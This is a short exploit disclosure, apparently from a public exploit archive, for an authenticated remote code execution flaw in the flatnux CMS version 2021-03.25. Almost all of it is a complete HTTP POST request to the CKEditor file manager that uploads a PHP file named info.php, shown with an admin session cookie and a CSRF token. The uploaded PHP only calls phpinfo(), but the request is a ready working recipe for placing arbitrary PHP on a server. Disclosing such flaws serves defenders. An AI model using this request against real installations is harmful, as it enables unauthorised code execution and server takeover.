Authored by Omer Hasan Durmus

flatnux version 2021-03.25 suffers from a remote code execution vulnerability.

# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)
# Exploit Author: Ömer Hasan Durmuş
# Vendor Homepage: https://en.altervista.org
# Software Link: http://flatnux.altervista.org/flatnux.html
# Version: 2021-03.25
# Tested on: Windows/Linux

POST
/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=en
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------393526031113460918603940283286
Content-Length: 413
Origin: http://localhost
Connection: close
Referer:
http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnew
Cookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;
ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------393526031113460918603940283286
Content-Disposition: form-data; name="upload"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------393526031113460918603940283286
Content-Disposition: form-data; name="ckCsrfToken"

BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb
-----------------------------393526031113460918603940283286--